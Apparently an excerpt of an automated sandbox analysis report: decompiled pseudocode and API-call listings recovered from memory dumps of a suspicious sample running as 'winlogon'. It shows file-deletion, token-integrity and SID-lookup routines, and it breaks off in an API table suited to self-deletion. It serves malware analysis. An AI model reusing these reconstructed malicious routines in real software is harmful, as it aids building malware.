    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 100%
    			E00D72CA4(WCHAR* _a4) {
    				int _t2;
    
    				_t2 = DeleteFileW(_a4); // executed
    				if(_t2 != 0) {
    					return 0;
    				} else {
    					return E00D720EC(GetLastError()) | 0xffffffff;
    				}
    			}

    APIs
    • DeleteFileW.KERNELBASE(00000000,?,00D6E768,00000000,?,?,?,00D61C34,?), ref: 00D72CAC
    • GetLastError.KERNEL32(?,00D6E768,00000000,?,?,?,00D61C34,?), ref: 00D72CB6
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 100%
    			E00D67390(void* __ecx) {
    				int _v8;
    				void* _t6;
    				void* _t7;
    				void* _t9;
    				void* _t10;
    				void* _t11;
    				void* _t12;
    
    				_v8 = 0;
    				CommandLineToArgvW(GetCommandLineW(),  &_v8); // executed
    				_t6 = E00D671E0(_t7, _t9, _t10, _t11, _t12); // executed
    				return _t6;
    			}

    APIs
    • GetCommandLineW.KERNEL32(?), ref: 00D6739F
    • CommandLineToArgvW.SHELL32(00000000), ref: 00D673A6
      • Part of subcall function 00D671E0: GetCurrentProcessId.KERNEL32(276B9783,00000000,00000000,00D7E42B,000000FF,?,invalid vector<T> subscript), ref: 00D67210
      • Part of subcall function 00D671E0: GetModuleHandleW.KERNEL32(00000000,?,000003FF), ref: 00D6731C
      • Part of subcall function 00D671E0: GetModuleFileNameW.KERNEL32(00000000), ref: 00D67323
      • Part of subcall function 00D671E0: WSACleanup.WS2_32 ref: 00D6733B
      • Part of subcall function 00D671E0: DeleteCriticalSection.KERNEL32(?), ref: 00D67354
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 72%
    			E00D6ACFE(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, void* __esi) {
    				void* _t10;
    				intOrPtr _t12;
    				signed short _t17;
    				void* _t20;
    				void* _t27;
    				void* _t29;
    				void* _t31;
    				char _t35;
    				void* _t36;
    				intOrPtr* _t40;
    				void* _t44;
    				void* _t50;
    				intOrPtr* _t51;
    				intOrPtr* _t52;
    				void* _t53;
    				intOrPtr* _t54;
    				void* _t55;
    
    				_t50 = __esi;
    				_t48 = __edi;
    				_t47 = __edx;
    				_t36 = __ecx;
    				E00D6B650(__ebx, __edi, 0xd86718, 0x14);
    				_t10 = E00D6B106(_t36, __edx, 1); // executed
    				if(_t10 != 0) {
    					L2:
    					_t35 = 0;
    					 *((char*)(_t55 - 0x19)) = 0;
    					 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
    					 *((char*)(_t55 - 0x24)) = E00D6B0D1();
    					_t12 =  *0xd90ee4; // 0x2
    					if(_t12 == 1) {
    						goto L1;
    					}
    					if(_t12 != 0) {
    						_t35 = 1;
    						 *((char*)(_t55 - 0x19)) = 1;
    						L8:
    						E00D6B260( *((intOrPtr*)(_t55 - 0x24)));
    						_pop(_t40);
    						_t51 = E00D6B3FA();
    						if( *_t51 != 0) {
    							_t29 = E00D6B1D6(_t35, 0);
    							_t40 = _t51;
    							if(_t29 != 0) {
    								_t54 =  *_t51;
    								_t40 = _t54;
    								L00D6B643();
    								 *_t54(0, 2, 0);
    							}
    						}
    						_t52 = E00D6B400();
    						if( *_t52 != 0) {
    							_t27 = E00D6B1D6(_t35, 0);
    							_t40 = _t52;
    							if(_t27 != 0) {
    								_push( *_t52);
    								E00D70E16(_t35, _t47, 0);
    								_pop(_t40);
    							}
    						}
    						_t17 = E00D6B521();
    						_t20 = E00D67390(_t40, 0xd60000, 0, E00D70AF6(), _t17 & 0x0000ffff); // executed
    						_t53 = _t20;
    						if(E00D6B554() == 0) {
    							E00D70E4E(_t53);
    						}
    						if(_t35 == 0) {
    							E00D70DF1();
    						}
    						E00D6B27D(_t40, 1, 0);
    						 *(_t55 - 4) = 0xfffffffe;
    						L19:
    						return E00D6B696();
    					}
    					 *0xd90ee4 = 1;
    					_t31 = E00D70B98(1, _t48, _t50, 0xd7f29c, 0xd7f2b4); // executed
    					_pop(_t44);
    					if(_t31 == 0) {
    						E00D70B3C(0, _t44, _t48, _t50, 0xd7f27c, 0xd7f298); // executed
    						 *0xd90ee4 = 2;
    						goto L8;
    					} else {
    						 *(_t55 - 4) = 0xfffffffe;
    						goto L19;
    					}
    				}
    				L1:
    				E00D6B406(_t47, _t48, 7);
    				goto L2;
    			}

    APIs
      • Part of subcall function 00D6B406: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6B413
      • Part of subcall function 00D6B406: IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 00D6B4DB
      • Part of subcall function 00D6B406: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D6B4FA
      • Part of subcall function 00D6B406: UnhandledExceptionFilter.KERNEL32(?), ref: 00D6B504
    • ___scrt_get_show_window_mode.LIBCMT ref: 00D6ADDA
      • Part of subcall function 00D6B521: GetStartupInfoW.KERNEL32(?), ref: 00D6B53B
      • Part of subcall function 00D67390: GetCommandLineW.KERNEL32(?), ref: 00D6739F
      • Part of subcall function 00D67390: CommandLineToArgvW.SHELL32(00000000), ref: 00D673A6
      • Part of subcall function 00D6B554: GetModuleHandleW.KERNEL32(00000000,00D70C27,00D86AA8,0000000C,00D70E11,00000003,00000002,00000000,?,00D7188F,00000003,00D71FDD), ref: 00D6B556
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 88%
    			E00D6DEE6(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
    				struct HINSTANCE__* _t13;
    				signed int* _t20;
    				signed int _t28;
    				signed int _t29;
    				signed int _t30;
    				signed int _t34;
    				intOrPtr* _t35;
    
    				_t20 = 0xd90f7c + _a4 * 4;
    				asm("lock cmpxchg [ebx], ecx");
    				_t28 =  *0xd88004; // 0x276b9783
    				_t30 = _t29 | 0xffffffff;
    				_t34 = _t28 ^ 0;
    				asm("ror esi, cl");
    				if(_t34 == _t30) {
    					L14:
    					return 0;
    				}
    				if(_t34 == 0) {
    					_t35 = _a12;
    					if(_t35 == _a16) {
    						L7:
    						_t13 = 0;
    						L8:
    						if(_t13 == 0) {
    							L13:
    							_push(0x20);
    							asm("ror edi, cl");
    							 *_t20 = _t30 ^ _t28;
    							goto L14;
    						}
    						_t34 = GetProcAddress(_t13, _a8);
    						if(_t34 == 0) {
    							_t28 =  *0xd88004; // 0x276b9783
    							goto L13;
    						}
    						 *_t20 = E00D6DEC9(_t34);
    						goto L2;
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						_t13 = E00D6DF86( *_t35); // executed
    						if(_t13 != 0) {
    							break;
    						}
    						_t35 = _t35 + 4;
    						if(_t35 != _a16) {
    							continue;
    						}
    						_t28 =  *0xd88004; // 0x276b9783
    						goto L7;
    					}
    					_t28 =  *0xd88004; // 0x276b9783
    					goto L8;
    				}
    				L2:
    				return _t34;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx,00000000,?,00D6DE74,00D90F50,00000FA0), ref: 00D6DF4A
      • Part of subcall function 00D6DF86: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00D90F50,?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx), ref: 00D6DFBE
      • Part of subcall function 00D6DF86: GetLastError.KERNEL32(?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx,00000000,?,00D6DE74), ref: 00D6DFCA
      • Part of subcall function 00D6DF86: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx), ref: 00D6DFD8
      • Part of subcall function 00D6DF86: FreeLibrary.KERNEL32(00000000,?,?,00D6DF2D,?,00D90F50,00000000,?,?,00D6E10C,00000008,InitializeCriticalSectionEx,00D7F6B4,InitializeCriticalSectionEx,00000000), ref: 00D6DFFA
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 80%
    			E00D62920(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				char _v12;
    				void* __edi;
    				void* __esi;
    				void* _t15;
    				intOrPtr _t23;
    				void* _t27;
    				void* _t28;
    				void* _t29;
    
    				_push(0xdeefbad7);
    				_t27 = __edx;
    				_t28 = __ecx;
    				_push(__edx);
    				if(E00D61A30(0, __ecx) == 0) {
    					L10:
    					__eflags = 0;
    					return 0;
    				} else {
    					_push(0xdeefbad7);
    					_v8 = 0xffffffff;
    					_push( &_v8);
    					if(E00D61A30(0, _t28) == 0 || OpenProcessToken(_t28, 8,  &_v8) == 0) {
    						goto L10;
    					} else {
    						_t21 = _v8;
    						if(_v8 == 0) {
    							goto L10;
    						} else {
    							_v12 = 0;
    							_t15 = E00D62820(_t21,  &_v12); // executed
    							_t39 = _t15;
    							if(_t15 == 0) {
    								goto L10;
    							} else {
    								_t29 = E00D626C0(__ebx, _v12, _t27, _t27, _t28, _t39);
    								_t23 = _v12;
    								if(_t23 != 0 && _t23 != 0xffffffff && _t23 != 0xcccccccc) {
    									E00D7009A(_t23);
    								}
    								return _t29;
    							}
    						}
    					}
    				}
    			}

    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62967
      • Part of subcall function 00D62820: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00D62873
      • Part of subcall function 00D62820: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?), ref: 00D628A6
      • Part of subcall function 00D62820: IsValidSid.ADVAPI32(00000000,?,TokenIntegrityLevel,00000000,00000000,00000000,?), ref: 00D628B2
      • Part of subcall function 00D62820: GetLengthSid.ADVAPI32(00000000,?,TokenIntegrityLevel,00000000,00000000,00000000,?), ref: 00D628BE
      • Part of subcall function 00D62820: CopySid.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 00D628DD
      • Part of subcall function 00D626C0: IsValidSid.ADVAPI32 ref: 00D626F3
      • Part of subcall function 00D626C0: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00D62713
      • Part of subcall function 00D626C0: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00D627A3
      • Part of subcall function 00D626C0: LocalFree.KERNEL32(00000000,?,?,?), ref: 00D627FD
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 90%
    			E00D74C37(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
    				struct HINSTANCE__* _t13;
    				signed int* _t20;
    				signed int _t27;
    				signed int _t28;
    				signed int _t29;
    				signed int _t33;
    				intOrPtr* _t34;
    
    				_t20 = 0xd914b8 + _a4 * 4;
    				_t27 =  *0xd88004; // 0x276b9783
    				_t29 = _t28 | 0xffffffff;
    				_t33 = _t27 ^  *_t20;
    				asm("ror esi, cl");
    				if(_t33 == _t29) {
    					L14:
    					return 0;
    				}
    				if(_t33 == 0) {
    					_t34 = _a12;
    					if(_t34 == _a16) {
    						L7:
    						_t13 = 0;
    						L8:
    						if(_t13 == 0) {
    							L13:
    							_push(0x20);
    							asm("ror edi, cl");
    							 *_t20 = _t29 ^ _t27;
    							goto L14;
    						}
    						_t33 = GetProcAddress(_t13, _a8);
    						if(_t33 == 0) {
    							_t27 =  *0xd88004; // 0x276b9783
    							goto L13;
    						}
    						 *_t20 = E00D6DEC9(_t33);
    						goto L2;
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						_t13 = E00D74CD3( *_t34); // executed
    						if(_t13 != 0) {
    							break;
    						}
    						_t34 = _t34 + 4;
    						if(_t34 != _a16) {
    							continue;
    						}
    						_t27 =  *0xd88004; // 0x276b9783
    						goto L7;
    					}
    					_t27 =  *0xd88004; // 0x276b9783
    					goto L8;
    				}
    				L2:
    				return _t33;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364,?,00D7202C,00000000), ref: 00D74C97
      • Part of subcall function 00D74CD3: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue), ref: 00D74D05
      • Part of subcall function 00D74CD3: GetLastError.KERNEL32(?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364,?,00D7202C), ref: 00D74D11
      • Part of subcall function 00D74CD3: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000), ref: 00D74D1F
      • Part of subcall function 00D74CD3: FreeLibrary.KERNEL32(00000000,?,00D74C7A,?,00000000,00000000,00000000,?,00D74EC5,00000006,FlsSetValue,00D80B4C,00D80B54,00000000,00000364), ref: 00D74D41
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 72%
    			E00D72610(void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
    				char _v8;
    				char _v12;
    				void* _v16;
    				intOrPtr _v20;
    				char _v32;
    				void* _t25;
    
    				E00D723DE( &_v32, _a8);
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				if(_v12 != 0) {
    					_t25 = E00D78B26( &_v8, _a4, _v20, _a12, 0x180); // executed
    					if(_t25 != 0) {
    						goto L1;
    					}
    					 *0xd91248 =  *0xd91248 + 1;
    					asm("lock or [eax], ecx");
    					 *((intOrPtr*)(_a16 + 8)) = 0;
    					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
    					 *((intOrPtr*)(_a16 + 4)) = 0;
    					 *_a16 = 0;
    					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
    					return _a16;
    				}
    				L1:
    				return 0;
    			}

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 74%
    			E00D6FFD9(void* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
    				signed int _v8;
    				signed int _v12;
    				void* __esi;
    				void* _t13;
    				intOrPtr _t17;
    				signed int _t21;
    				signed int _t25;
    				intOrPtr _t27;
    				intOrPtr* _t29;
    
    				_t27 = __edx;
    				_push(__ecx);
    				_push(__ecx);
    				_t29 = _a4;
    				if(_t29 != 0) {
    					__eflags = _a8 - 1;
    					if(__eflags != 0) {
    						goto L2;
    					} else {
    						_v12 = _v12 & 0x00000000;
    						_v8 = _v8 & 0x00000000;
    						_push(_t21);
    						E00D74EF7(__ecx, _t29, __eflags,  &_v12); // executed
    						_t25 = _v12 - 0xd53e8000;
    						_push(0);
    						_push(0x989680);
    						asm("sbb eax, 0x19db1de");
    						_push(_v8);
    						_push(_t25);
    						_t17 = E00D7D7E0();
    						_v8 = _t21;
    						__eflags = _t27 - 7;
    						if(__eflags < 0) {
    							L7:
    							 *_t29 = _t17;
    							 *((intOrPtr*)(_t29 + 4)) = _t27;
    							_t13 = 1;
    							__eflags = 1;
    							 *(_t29 + 8) = _t25 * 0x64;
    						} else {
    							if(__eflags > 0) {
    								goto L2;
    							} else {
    								__eflags = _t17 - 0x93406fff;
    								if(_t17 > 0x93406fff) {
    									goto L2;
    								} else {
    									goto L7;
    								}
    							}
    						}
    					}
    				} else {
    					 *((intOrPtr*)(E00D72122())) = 0x16;
    					E00D70269();
    					L2:
    					_t13 = 0;
    				}
    				return _t13;
    			}

    APIs
      • Part of subcall function 00D74EF7: GetSystemTimeAsFileTime.KERNEL32(00000000,00D70075), ref: 00D74F36
    • __alldvrm.INT64 ref: 00D7002E
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 95%
    			E00D71890(void* __ecx, signed int _a4, signed int _a8) {
    				void* __esi;
    				void* _t8;
    				void* _t12;
    				signed int _t13;
    				void* _t15;
    				void* _t16;
    				void* _t19;
    				signed int _t20;
    				long _t21;
    
    				_t16 = __ecx;
    				_t20 = _a4;
    				if(_t20 == 0) {
    					L2:
    					_t21 = _t20 * _a8;
    					if(_t21 == 0) {
    						_t21 = _t21 + 1;
    					}
    					while(1) {
    						_t8 = RtlAllocateHeap( *0xd916c0, 8, _t21); // executed
    						if(_t8 != 0) {
    							break;
    						}
    						__eflags = E00D7105D();
    						if(__eflags == 0) {
    							L8:
    							 *((intOrPtr*)(E00D72122())) = 0xc;
    							__eflags = 0;
    							return 0;
    						}
    						_t12 = E00D702E8(_t15, _t16, _t19, _t21, __eflags, _t21);
    						_pop(_t16);
    						__eflags = _t12;
    						if(_t12 == 0) {
    							goto L8;
    						}
    					}
    					return _t8;
    				}
    				_t13 = 0xffffffe0;
    				if(_t13 / _t20 < _a8) {
    					goto L8;
    				}
    				goto L2;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D7200F,00000001,00000364,?,?,?,00D72127,00D717EB,?,?,00D61B36), ref: 00D718D1
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 68%
    			E00D62650(void* __ecx, WCHAR* __edx, void* __eflags) {
    				long _v8;
    				long _v12;
    				void* _t7;
    				signed int _t12;
    				void* _t17;
    
    				_push(0xdeefbad7);
    				_t17 = __ecx;
    				_push(__edx);
    				_t7 = E00D61A30(0, __ecx);
    				if(_t7 != 0) {
    					 *__edx = 0;
    					_v12 = 0x103;
    					_v8 = 0x103;
    					_t12 = LookupAccountSidW(0, _t17, __edx,  &_v12,  &(__edx[0x104]),  &_v8,  &(__edx[0x208])); // executed
    					asm("sbb eax, eax");
    					return  ~( ~_t12);
    				} else {
    					return _t7;
    				}
    			}

    APIs
    • LookupAccountSidW.ADVAPI32(00000000,?,?,00000103,?,?,?), ref: 00D626A1
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 94%
    			E00D717FF(void* __ecx, long _a4) {
    				void* __esi;
    				void* _t4;
    				void* _t6;
    				void* _t7;
    				void* _t8;
    				void* _t9;
    				long _t10;
    
    				_t8 = __ecx;
    				_t10 = _a4;
    				if(_t10 > 0xffffffe0) {
    					L7:
    					 *((intOrPtr*)(E00D72122())) = 0xc;
    					__eflags = 0;
    					return 0;
    				}
    				if(_t10 == 0) {
    					_t10 = _t10 + 1;
    				}
    				while(1) {
    					_t4 = RtlAllocateHeap( *0xd916c0, 0, _t10); // executed
    					if(_t4 != 0) {
    						break;
    					}
    					__eflags = E00D7105D();
    					if(__eflags == 0) {
    						goto L7;
    					}
    					_t6 = E00D702E8(_t7, _t8, _t9, _t10, __eflags, _t10);
    					_pop(_t8);
    					__eflags = _t6;
    					if(_t6 == 0) {
    						goto L7;
    					}
    				}
    				return _t4;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D61CE9,?,?,?,?,00D61B06,?,00000001), ref: 00D71831
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 100%
    			E00D78814(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
    				void* _t10;
    
    				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
    				return _t10;
    			}

    APIs
    • CreateFileW.KERNEL32(00000000,00000000,?,00D78BEF,?,?,00000000), ref: 00D78831
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    C-Code - Quality: 100%
    			E00D717C5(void* _a4) {
    				int _t3;
    				intOrPtr* _t4;
    				intOrPtr _t6;
    
    				if(_a4 != 0) {
    					_t3 = HeapFree( *0xd916c0, 0, _a4); // executed
    					if(_t3 == 0) {
    						_t4 = E00D72122();
    						_t6 = E00D720A9(GetLastError());
    						 *_t4 = _t6;
    						return _t6;
    					}
    				}
    				return _t3;
    			}

    APIs
    • HeapFree.KERNEL32(00000000,00000000), ref: 00D717DB
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Non-executed Functions

    C-Code - Quality: 89%
    			E00D65DD0(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi, void* __esi, long _a4, long _a8, struct _PROCESS_INFORMATION _a12, long _a28, struct _STARTUPINFOW _a32, void* _a36, signed int _a76, void _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, intOrPtr _a124, intOrPtr _a128, intOrPtr _a132, void* _a140, short _a144, short _a2224, signed int _a4276) {
    				void* _v0;
    				signed int _t54;
    				void _t68;
    				void* _t70;
    				long _t87;
    				void* _t94;
    				intOrPtr _t116;
    				void* _t119;
    				void* _t122;
    				WCHAR* _t125;
    				_Unknown_base(*)()* _t130;
    				signed int _t131;
    				signed int _t132;
    				signed int _t133;
    
    				_t132 = _t131 & 0xfffffff8;
    				E00D7D900();
    				_t54 =  *0xd88004; // 0x276b9783
    				_a4276 = _t54 ^ _t132;
    				_push(__edi);
    				_v0 = __ecx;
    				_t125 = __edx;
    				E00D6D520(__edi,  &_a104, 0, 0x848);
    				_t133 = _t132 + 0xc;
    				_t116 = GetFileSize;
    				_a112 = ExitProcess;
    				_a116 = GetFileAttributesW;
    				_a120 = CreateFileW;
    				_a104 = Sleep;
    				_a108 = DeleteFileW;
    				_a124 = GetFileSize;
    				_a128 = WriteFile;
    				_a132 = CloseHandle;
